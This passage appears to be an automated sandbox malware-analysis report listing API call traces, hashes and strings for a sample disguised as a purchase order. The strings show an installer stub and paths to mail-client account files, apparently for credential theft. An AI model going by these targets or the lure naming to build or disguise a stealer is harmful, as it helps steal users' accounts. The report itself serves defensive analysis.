                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                              • String ID: 9
                                                              • API String ID: 1149667376-2366072709
                                                              • Opcode ID: 25305ac4e9b43401c62344d4a8783106e8ed45d883596a7dd8de98379e43bd88
                                                              • Instruction ID: 7a29d1be5ffbe8e369a4709248b8008a71e905d773f4f6332667e592b1311aba
                                                              • Opcode Fuzzy Hash: 25305ac4e9b43401c62344d4a8783106e8ed45d883596a7dd8de98379e43bd88
                                                              • Instruction Fuzzy Hash: BB51E671E04209ABDF24DF94DA88AAEB779FF04304F50443BE501B62D0D7B99E42CB69
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 382A339B
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 382A33A3
                                                              • _ValidateLocalCookies.LIBCMT ref: 382A3431
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 382A345C
                                                              • _ValidateLocalCookies.LIBCMT ref: 382A34B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: cc526f70fddc7119aaee38428d2043b370fc1f895d4685b7b97a22cc0322f159
                                                              • Instruction ID: f0556215968782640250f425ad7118087634946e16984bf20520596b00393382
                                                              • Opcode Fuzzy Hash: cc526f70fddc7119aaee38428d2043b370fc1f895d4685b7b97a22cc0322f159
                                                              • Instruction Fuzzy Hash: 4741C978E04349ABCB01CF68C848E9EBBB5BFC5724F108159ED155B251DF39D945CB90
                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                              • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                              • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                              • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                              • String ID:
                                                              • API String ID: 3294113728-0
                                                              • Opcode ID: 38bdd8529c47ea5edffceb92d72af5ec9064ba07a11341120463422747a5320d
                                                              • Instruction ID: 760673b96d72cef8a70f9bf76d43f75bad9b7db283b6dfdc5a98cea5addec372
                                                              • Opcode Fuzzy Hash: 38bdd8529c47ea5edffceb92d72af5ec9064ba07a11341120463422747a5320d
                                                              • Instruction Fuzzy Hash: A631A072C00118BBDF11AFA5CE49DAF7E79EF05364F20423AF510762E1C6796E418BA9
                                                              APIs
                                                              • lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                              • lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                              • lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040528F
                                                              • SetWindowTextW.USER32(004216C8,004216C8), ref: 004052A1
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 2531174081-0
                                                              • Opcode ID: e6254bc0b427cfb90636518a2a52407bbdb88d41cc3866dc0c37eea2ece6cf4b
                                                              • Instruction ID: 32bcb3a4223b847dfb51cc2a11ed2745bf7a1ac09c1f1387fae00188f216a620
                                                              • Opcode Fuzzy Hash: e6254bc0b427cfb90636518a2a52407bbdb88d41cc3866dc0c37eea2ece6cf4b
                                                              • Instruction Fuzzy Hash: 85219071900658BBCB119F55DD84ADFBFB8EF44350F54807AF904B62A0C7798A41CFA8
                                                              APIs
                                                                • Part of subcall function 382A9221: _free.LIBCMT ref: 382A924A
                                                              • _free.LIBCMT ref: 382A92AB
                                                                • Part of subcall function 382A571E: HeapFree.KERNEL32(00000000,00000000,?,382A924F,?,00000000,?,00000000,?,382A9276,?,00000007,?,?,382A7E5A,?), ref: 382A5734
                                                                • Part of subcall function 382A571E: GetLastError.KERNEL32(?,?,382A924F,?,00000000,?,00000000,?,382A9276,?,00000007,?,?,382A7E5A,?,?), ref: 382A5746
                                                              • _free.LIBCMT ref: 382A92B6
                                                              • _free.LIBCMT ref: 382A92C1
                                                              • _free.LIBCMT ref: 382A9315
                                                              • _free.LIBCMT ref: 382A9320
                                                              • _free.LIBCMT ref: 382A932B
                                                              • _free.LIBCMT ref: 382A9336
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                              • Instruction ID: 05c2d662e05d59121654fdd44c9f5bb6d3e879820bc756529bae1a45fd301e40
                                                              • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                              • Instruction Fuzzy Hash: 32112175540B08FED620ABF2DD85FCBFBADAF04700F804836A6A976062DE6DF5044751
                                                              APIs
                                                              • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                              • GetTickCount.KERNEL32 ref: 00402D53
                                                              • wsprintfW.USER32 ref: 00402D81
                                                                • Part of subcall function 00405234: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                • Part of subcall function 00405234: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040528F
                                                                • Part of subcall function 00405234: SetWindowTextW.USER32(004216C8,004216C8), ref: 004052A1
                                                                • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,00000064,?), ref: 00402D13
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                              • String ID: ... %d%%
                                                              • API String ID: 722711167-2449383134
                                                              • Opcode ID: ebd009b060d6928dfd3d4acf8f2c4ed0ef9a07e9986a444e5ec5ed1f97bf102b
                                                              • Instruction ID: 78f52ac4307216ae4daf114a653e214d9194ffd889c5bb91718f5c3abb157098
                                                              • Opcode Fuzzy Hash: ebd009b060d6928dfd3d4acf8f2c4ed0ef9a07e9986a444e5ec5ed1f97bf102b
                                                              • Instruction Fuzzy Hash: D1015E31909220EBC7616B64EE5DBDA3AA8AF00704B14457BF905B11F5C6B85C45CFAE
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B19
                                                              • GetMessagePos.USER32 ref: 00404B21
                                                              • ScreenToClient.USER32(?,?), ref: 00404B3B
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B4D
                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B73
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$ClientScreen
                                                              • String ID: f
                                                              • API String ID: 41195575-1993550816
                                                              • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                              • Instruction ID: 7d165c7f7153624e3963f679d066e3c154625e4b871d361bb7407d5cf98d8b00
                                                              • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                              • Instruction Fuzzy Hash: 97014C71D00219BADB00DB94DD85FFEBBBCAB59711F10412ABB10B71D0D7B4A9018BA5
                                                              APIs
                                                              • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C9D
                                                              • wsprintfW.USER32 ref: 00402CD1
                                                              • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                              • API String ID: 1451636040-1158693248
                                                              • Opcode ID: d7a3991d3a07419e7fab2ec9ad69e777b35ce877a0d2332f2df68b5c385b0569
                                                              • Instruction ID: 1a6e545745197b7d5f0e024d91f0b7ce6738c211f373f8126abe8c19e9ad5020
                                                              • Opcode Fuzzy Hash: d7a3991d3a07419e7fab2ec9ad69e777b35ce877a0d2332f2df68b5c385b0569
                                                              • Instruction Fuzzy Hash: A6F03670504108BBEF205F50DD4ABEE3768FB00309F00843AFA16B51D1DBB95959DF59
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,382A6FFD,00000000,?,?,?,382A8A72,?,?,00000100), ref: 382A887B
                                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,382A8A72,?,?,00000100,5EFC4D8B,?,?), ref: 382A8901
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 382A89FB
                                                              • __freea.LIBCMT ref: 382A8A08
                                                                • Part of subcall function 382A56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 382A5702
                                                              • __freea.LIBCMT ref: 382A8A11
                                                              • __freea.LIBCMT ref: 382A8A36
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: 83055c96e73b83ffdf9447b50b840829547306f6b42b72fc6eea299749f44a91
                                                              • Instruction ID: d30e660cd154f0f49c5e77019ce847d30ae3af9b8151fdf0afeecbc2c048bf30
                                                              • Opcode Fuzzy Hash: 83055c96e73b83ffdf9447b50b840829547306f6b42b72fc6eea299749f44a91
                                                              • Instruction Fuzzy Hash: 2851B3B6A1021BAFEB158E74CC84EAB77AAEF44794F514629FD04E6180EF38DC54C690
                                                              APIs
                                                              • _strlen.LIBCMT ref: 382A1607
                                                              • _strcat.LIBCMT ref: 382A161D
                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,382A190E,?,?,00000000,?,00000000), ref: 382A1643
                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,382A190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 382A165A
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,382A190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 382A1661
                                                              • lstrcatW.KERNEL32(00001008,?,?,?,?,?,382A190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 382A1686
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: lstrcatlstrlen$_strcat_strlen
                                                              • String ID:
                                                              • API String ID: 1922816806-0
                                                              • Opcode ID: 0925f24330c49caeb5e6beb4b9ce758780bf0e16c098370b2903fee91706cf48
                                                              • Instruction ID: f0d3e19680649b775965394bc7ff7fa1d44fd324eead3a69626dedc3321ea154
                                                              • Opcode Fuzzy Hash: 0925f24330c49caeb5e6beb4b9ce758780bf0e16c098370b2903fee91706cf48
                                                              • Instruction Fuzzy Hash: D721AD3A900204BBD705DF64DC84FEE7BB9EF48724F24441AE905FB141DF38A64687A5
                                                              APIs
                                                              • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 382A1038
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 382A104B
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 382A1061
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 382A1075
                                                              • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 382A1090
                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 382A10B8
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$AttributesFilelstrcat
                                                              • String ID:
                                                              • API String ID: 3594823470-0
                                                              • Opcode ID: 24003238a04be33d9ecdc8538832039cbce0c6130f8d290d46d27127e543a40b
                                                              • Instruction ID: 6d31ba423ecf507257dc25499cca907ea3fbb2922ab6fa0aa7957f7c04fad039
                                                              • Opcode Fuzzy Hash: 24003238a04be33d9ecdc8538832039cbce0c6130f8d290d46d27127e543a40b
                                                              • Instruction Fuzzy Hash: 5C219279900319ABCF10DBA0DD8CEDF37B9EF44324F504296E85A971A1DE389A86CF40
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,382A3518,382A23F1,382A1F17), ref: 382A3864
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 382A3872
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 382A388B
                                                              • SetLastError.KERNEL32(00000000,?,382A3518,382A23F1,382A1F17), ref: 382A38DD
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 9ffe36114bf11c93ea50008fa728542de201fce6a91b314d018f23cd7af6ff21
                                                              • Instruction ID: 95ac018a1e7fdfcd2c2534043a27acbe189030f2396565432028296d758780ab
                                                              • Opcode Fuzzy Hash: 9ffe36114bf11c93ea50008fa728542de201fce6a91b314d018f23cd7af6ff21
                                                              • Instruction Fuzzy Hash: BA01A77A60AB12AEB2051AF97C8DD572FD6EFC57B5720063EED10A50D0EF6D48429344
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,382A6C6C), ref: 382A5AFA
                                                              • _free.LIBCMT ref: 382A5B2D
                                                              • _free.LIBCMT ref: 382A5B55
                                                              • SetLastError.KERNEL32(00000000,?,?,382A6C6C), ref: 382A5B62
                                                              • SetLastError.KERNEL32(00000000,?,?,382A6C6C), ref: 382A5B6E
                                                              • _abort.LIBCMT ref: 382A5B74
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID:
                                                              • API String ID: 3160817290-0
                                                              • Opcode ID: 6e9c6e77acce380d7a77fc030458b48e33df3782d4e4558553ddd78056cf95f3
                                                              • Instruction ID: 2bb48d8d500144a21e72f5879435a2624b1e562cd2d91e05e7d443b58be7b253
                                                              • Opcode Fuzzy Hash: 6e9c6e77acce380d7a77fc030458b48e33df3782d4e4558553ddd78056cf95f3
                                                              • Instruction Fuzzy Hash: C8F0C8BE544A01FED2061AF46F4DE1F2BBA9FC1B72B650928F914B6194FE3C84474164
                                                              APIs
                                                                • Part of subcall function 382A1E89: lstrlenW.KERNEL32(?,?,?,?,?,382A10DF,?,?,?,00000000), ref: 382A1E9A
                                                                • Part of subcall function 382A1E89: lstrcatW.KERNEL32(?,?,?,382A10DF,?,?,?,00000000), ref: 382A1EAC
                                                                • Part of subcall function 382A1E89: lstrlenW.KERNEL32(?,?,382A10DF,?,?,?,00000000), ref: 382A1EB3
                                                                • Part of subcall function 382A1E89: lstrlenW.KERNEL32(?,?,382A10DF,?,?,?,00000000), ref: 382A1EC8
                                                                • Part of subcall function 382A1E89: lstrcatW.KERNEL32(?,382A10DF,?,382A10DF,?,?,?,00000000), ref: 382A1ED3
                                                              • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 382A122A
                                                                • Part of subcall function 382A173A: _strlen.LIBCMT ref: 382A1855
                                                                • Part of subcall function 382A173A: _strlen.LIBCMT ref: 382A1869
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                              • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                              • API String ID: 4036392271-1520055953
                                                              • Opcode ID: be730af61ef93e0f025217e1ee00a62a3335b40baf9b0ca832978a24deb0f3c6
                                                              • Instruction ID: cedc4cfcb1572462ef99fd897b479d941ff36c0989924b45e22be43374689d67
                                                              • Opcode Fuzzy Hash: be730af61ef93e0f025217e1ee00a62a3335b40baf9b0ca832978a24deb0f3c6
                                                              • Instruction Fuzzy Hash: 0121B4BDE102587AEB1097E0EC81FEE733AEF80724F100556FA05EB1D0EAB55D818759
                                                              APIs
                                                              • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A91
                                                              • wsprintfW.USER32 ref: 00404A9A
                                                              • SetDlgItemTextW.USER32(?,004226E8), ref: 00404AAD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ItemTextlstrlenwsprintf
                                                              • String ID: %u.%u%s%s$&B
                                                              • API String ID: 3540041739-2907463167
                                                              • Opcode ID: bde7a8dffae819bc06fe2be630a266a01d8c69a4eef698d78f136fb9ac7b6d1c
                                                              • Instruction ID: ab388700b69d78aa859054a1700c1a1d69e67ce61d201efd873ebc4ad7f6fd90
                                                              • Opcode Fuzzy Hash: bde7a8dffae819bc06fe2be630a266a01d8c69a4eef698d78f136fb9ac7b6d1c
                                                              • Instruction Fuzzy Hash: 4F11D8736441282BDB00656D9C45E9F328DDB85334F154237FA25F71D1EA78CC2286E9
                                                              APIs
                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,75573420,00403542), ref: 00406283
                                                              • CharNextW.USER32(?,?,?,00000000), ref: 00406292
                                                              • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,75573420,00403542), ref: 00406297
                                                              • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,75573420,00403542), ref: 004062AA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Char$Next$Prev
                                                              • String ID: *?|<>/":
                                                              • API String ID: 589700163-165019052
                                                              • Opcode ID: a15e7b9c92e4fac5837ba80ec03ec375c661933bbdfd6cc4147916c8a1456e26
                                                              • Instruction ID: 01726bbc4e2c448ec391ae67e872290cbd2d47d18a3812a7b55dff680105d5d8
                                                              • Opcode Fuzzy Hash: a15e7b9c92e4fac5837ba80ec03ec375c661933bbdfd6cc4147916c8a1456e26
                                                              • Instruction Fuzzy Hash: F511AB1580061295DB313B549C44B77A2F8EF99790F5240BFED96B32C0E7BC5C9286BD
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 0040252F
                                                              • lstrlenA.KERNEL32(00409D98,?,?,0040A598,000000FF,00409D98,00000400,?,?,00000021), ref: 00402536
                                                              • WriteFile.KERNEL32(00000000,?,00409D98,00000000,?,?,00000000,00000011), ref: 00402568
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
